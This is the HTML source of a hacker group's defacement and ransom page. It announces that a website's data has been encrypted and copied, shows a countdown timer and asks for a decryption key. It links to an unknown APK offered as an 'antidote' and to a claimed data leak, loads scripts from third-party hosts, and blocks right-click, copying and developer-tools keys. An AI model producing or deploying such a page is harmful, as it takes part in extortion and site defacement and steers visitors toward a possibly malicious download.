<html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Hacked by Trhacknon Team | Trhacknon ft Ransomware</title>
<meta name="description" content="You have been fucked">
<meta property="og:image" content="https://i.imgur.com/docfAG1.jpg">
<link rel="icon" href="https://e.top4top.io/p_2256vtpwy0.png">
<meta name="robots" content="index, follow">
<meta name="googlebot" content="index,follow" />
<meta name="robots" content="all"/><meta name="robots schedule" content="auto"/>
<meta name="distribution" content="global"/><link href="https://fonts.googleapis.com/css2?family=Rajdhani&display=swap" rel="stylesheet" type="text/css">
<base target='_blank'/><body><center>
<meta content='width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;' name='viewport' />
<meta name="viewport" content="width=device-width" />
<link rel="stylesheet" href="https://drive.google.com/u/0/uc?id=12tv_9xHFnv214BHrEhGzofuoHZmyZX91&export=download">
<style>
a:visited, a:hover, a:focus {
    text-decoration: none;
    color: white;
}
</style>
<style>
.gambargetar{position:relative}
img:hover{opacity:1}textarea{resize:none}
img {
    position:relative;opacity:1.0
}
</style>
<style type="text/css">
@media only screen and (max-device-width: 480px) {
html, body {
  overflow-x: hidden;
}
body {
  position: relative;
}
    img {    
    weight: 100%;
    position: relative;
    margin: -4;
}
</style>
<head>
<meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta http-equiv="X-UA-Compatible" content="ie=edge">
<style type="text/css">body, a:hover {cursor: url(https://cur.cursors-4u.net/cursors/cur-7/cur686.cur), progress !important;}</style>
</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
   body,td,th {
   color: #000;
   margin: 0;
   padding: 0;
   height: 100%;
   position: relative;
   font-family: 'Rajdhani', sans-serif;
   background-image: url("https://b.top4top.io/p_2256y9hr90.jpg");
   background-color:#000000;
   background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
  text-shadow: 3px 3px 2px black, 6px 6px 5px black, 6px 6px 5px black;
  a:visited, a:hover, a:focus {
    text-decoration: none;
    color: white;
}
   }
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<body>
<script type='text/javascript'>
//<![CDATA[
// Anti Klik Kanan
var message="Don't touch ! T'as pas le droit,  hi C. B";function clickIE4(){if(2==event.button)return alert(message),!1}function clickNS4(e){if((document.layers||document.getElementById&&!document.all)&&(2==e.which||3==e.which))return alert(message),!1}document.layers?(document.captureEvents(Event.MOUSEDOWN),document.onmousedown=clickNS4):document.all&&!document.getElementById&&(document.onmousedown=clickIE4),document.oncontextmenu=new Function("alert(message);return false");
//]]>
</script>
<script language="JavaScript">
</script>
<body onLoad="LoadFunctions()">
<script language="Javascript">
var msg="Ngotak sendiri cok jan copas";
function rtclickcheck(keyp){
if(navigator.appName == "Netscape" && keyp.which == 3){
alert(msg);
return false;
if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {
alert(msg);
return false;
}
}
document.onmousedown=rtclickcheck
</script>
<script>
setInterval(function(){
     $(".berkedip").toggle();
},300);
</script>
<script type="text/javascript">
        window.oncontextmenu = function () {
            return false;
        }
        $(document).keydown(function (event) {
            if (event.keyCode == 123) {
                return false;
            }
            else if ((event.ctrlKey && event.shiftKey && event.keyCode == 73) || (event.ctrlKey && event.shiftKey && event.keyCode == 74)) {
                return false;
            }
        });
</script>
<script>document.onkeydown = keydown;
document.onkeyup = keyup;


function keydown(e) {
console.log("key down triggered");
var keystroke = String.fromCharCode(event.keyCode).toLowerCase();


if (e.keyCode == 44 || e.keyCode == "44" || e.which == 44 || e.which == "44") {
e.cancelBubble = true;
e.preventDefault();
e.stopImmediatePropagation();
}

if (e.ctrlKey && (e.key == "P" || e.key == "C" || e.key == "A" || e.key == "p"||e.key == "c" || e.key == "a" || e.charCode == 16 || e.charCode == 112 ||e.keyCode == 80) || (e.keyCode == 44) || (e.keyCode == 123)) {
//alert("Trhacknon see you :Inspect element & Print &cut/copy option is restricted");
e.cancelBubble = true;
e.preventDefault();
e.stopImmediatePropagation();
}

if (e.keyCode > 111 && e.keyCode < 124) {
//alert("Function option is restricted");
e.cancelBubble = true;
e.preventDefault();
e.stopImmediatePropagation();
}

if (e.key == "F11" || e.key == "f11") {
//alert("Function option is restricted");
e.cancelBubble = true;
e.preventDefault();
e.stopImmediatePropagation();
}
}
function keyup(e) {
debugger;
console.log("key up triggered");
if (e.keyCode == 44 || e.keyCode == "44" || e.which == 44 || e.which =="44") {
e.cancelBubble = true;
e.preventDefault();
e.stopImmediatePropagation();
}

if (e.keyCode > 111 && e.keyCode < 124) {
e.cancelBubble = true;
e.preventDefault();
e.stopImmediatePropagation();
}
if (e.key == "F11" || e.key == "f11") {
//alert("Function option is restricted");
e.cancelBubble = true;
e.preventDefault();
e.stopImmediatePropagation();
} </script></body>
<style>
::-moz-selection {
  color: white;
  background: black;
}

::selection {
  color: white;
  background: black;
}
</style>
<!--<FONT size="3"  oncontextmenu="return false;" color=#FFFF00><CENTER><BIG>&#9733; &#9733; &#9733; &#9733; &#9733; &#9733;</BIG></CENTER></FONT>-->
<img src="https://g.top4top.io/p_2150bbviq1.jpg" border="0" width="200" height="200" style="object-fit: scale-down; max-width: 100%" onclick="location.href = 'https://t.me/';">
<div style="line-height:40%;">
<br>
</div><div id="Clock" align="center" style="font-size:58px;font-family:'iceland';color:red;"></div><hr width="80%">
<a <div id="center"> <font color="white" size="6" face="'Rajdhani', sans-serif" oncontextmenu="return false;">Hacked by<font color=#FFFF00> </font> <a style="text-decoration:none" href="https://1877.team"> <font color=#FFFF00>Trhacknon Team</a></font>
    <!--<div id="center"> <font size="5"><font face="'Rajdhani', sans-serif" color="#ff0000">KuR</font><font face="'Rajdhani', sans-serif" color="#ffffff">dis</font><font face="'Rajdhani', sans-serif" color="#ffff00">h~h</font><font face="'Rajdhani', sans-serif" color="#ffffff">ack</font><font face="'Rajdhani', sans-serif" color="#008000">ErS</font></font></div>-->
<div id="center"> <font color="white" size="5" face="1877" oncontextmenu="return false;">your website data encrypted and saved to our hard drive</a></div>
<div id="center"> <font color="white" size="5" face="1877" oncontextmenu="return false;">if you don't want to share your data in public</a></div>
<div id="center"> <font color="white" size="5" face="1877" oncontextmenu="return false;">and don't want to lose your data</a></div>
<div id="center"> <font color="white" size="5" face="1877" oncontextmenu="return false;">send <font color=#FFFF00>Love</a><font color="white"> to ukraine</a></div>
</head>
<body>
<style>
    p{
        color: red;
    }
</style>
<p id="demo" style="text-color: yellow;"></p>
<script>
// Set the date we're counting down to
var countDownDate = new Date("Mar 27, 2022 17:37:25").getTime();

// Update the count down every 1 second
var x = setInterval(function() {

  // Get today's date and time
  var now = new Date().getTime();
    
  // Find the distance between now and the count down date
  var distance = countDownDate - now;
    
  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);
    
  // Output the result in an element with id="demo"
  document.getElementById("demo").innerHTML = days + "d " + hours + "h "
  + minutes + "m " + seconds + "s ";
    
  // If the count down is over, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "TRHACKNON HAVE EAT YOU  ! ! !";
  }
}, 1000);
</script><script type="text/javascript" src="http://yourjavascript.com/11122802265/time.js"></script>
<script type="text/javascript" src="http://yourjavascript.com/842211267/clock.js"></script>
</body>
</html>
<div style="line-height:30%;">
<br>
</div>
<style>
.ameer1877m {
/*background-color: transparent;*/
background-color: transparent;
color: white;
width: 320px;
text-align: center;
border-color: yellow;
text-shadow: 3px 3px 2px black, 6px 6px 5px black, 6px 6px 5px black;
font-family: 'Rajdhani', sans-serif;
}
</style>
<center><input type = "text" value="WeAreAnonymousWeDontForgetWeDontForgiveExpectUs" class="ameer1877m" id="myInput" onclick="myFunction()" readonly></center>
<script>
function myFunction() {
  var copyText = document.getElementById("myInput");
  copyText.select();
  document.execCommand("copy");
  alert("copied message");
}
</script>
<div style="line-height:40%;">
<br>
</div>
<a href="https://t.me/" class="animated-button3" style="text-decoration: none" style="color: inherit;">
  <span></span>
  <span></span>
  <span></span>
  <span></span>
  Telegram
</a>
<a href="http://www.memanon.ml/defind.php" class="animated-button3" style="text-decoration: none" style="color: inherit;">
  <span></span>
  <span></span>
  <span></span>
  <span></span>
  Website
</a>
<br>
<style>
::placeholder {
  color: silver;
  opacity: 1;
}

:-ms-input-placeholder {
  color: silver;
}

::-ms-input-placeholder {
  color: silver;
}
</style>
<style type='text/css'>
                .inpute {
				    width: 211px;
                    border-color: yellow;
                    background-color: transparent;
                    color: white;
                    text-align: center;
					font-family: 'Rajdhani', sans-serif;					
					text-shadow: 3px 3px 2px black, 6px 6px 5px black, 6px 6px 5px black;
                }

                .submite {
                    border-color: yellow;
                    background-color: transparent;
                    color: white;
					font-family: 'Rajdhani', sans-serif;
					text-shadow: 3px 3px 2px black, 6px 6px 5px black, 6px 6px 5px black;
                }
            </style>
                <form action="" method="post" style=" text-align: center;">
                <input type="text" name="key" class="inpute" oncontextmenu="return true;" onkeydown="return true;" onmousedown="return true;" placeholder="Type Decryption Key" contenteditable="return true;" autocomplete="off">
                <input type="submit" name="submit" class="submite" value="Decrypt Website" />
<a href="https://myurlshorter.000webhostapp.com/pli58895q"><strong>DOWNLOAD ANTIDOTE:ELITE.APK</strong></a>
<a href="https://drive.google.com/u/0/uc?id=12tv_9xHFnv214BHrEhGzofuoHZmyZX91&export=download"><strong><br>Download dataleaks Op.Russia</strong></a>
<script></script>
<div style="line-height:40%;">
<br>
</div>
<div id="center"> <font color="white" size="5" face="1877" oncontextmenu="return false;">contact : @trhacknon Telegram</a></div>
<div id="center"> <font color="red" size="5" face="1877" oncontextmenu="return false;" >#Trhacknon</a></div>
 </form>
</div>
<FONT color=#FF0000></font><br>
</body>
</script>
</center>
</font>
</footer>
   <script>
    if ( window.history.replaceState ) {
        window.history.replaceState( null, null, window.location.href );
    }
</script>
<style>
::-webkit-scrollbar {
    width: 12px;
    background: #292929;
}

::-webkit-scrollbar-track {
    -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,84); 
}

::-webkit-scrollbar-thumb {
    border-radius: 12px;
    -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,84); 
    background: #ced100;
} 
</style>
<audio autoplay="true" loop src="https://archive.org/download/Overthinker1877/overthinker1877.mp3" volume = "100;">
    <meta name="keywords" content="1877 TEAM , Trhacknon, Jelena, lmarsu1312, Acab, PaiwandDefacer, MuhmadEmad, balasniper, mn peshmargam, S3RW4N, hamagold, kurd team, Kurdish Hackers, Kurdistan Hackers, Kurd Hack">
<script type="text/javascript" src="http://yourjavascript.com/3277132363/sakura.js"></script>
<span style="visibility: visible "><iframe width="0" height="0" src="https://api.soundcloud.com/tracks/510360879/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf" frameborder="0" allowfullscreen auotoplay></iframe>
</html>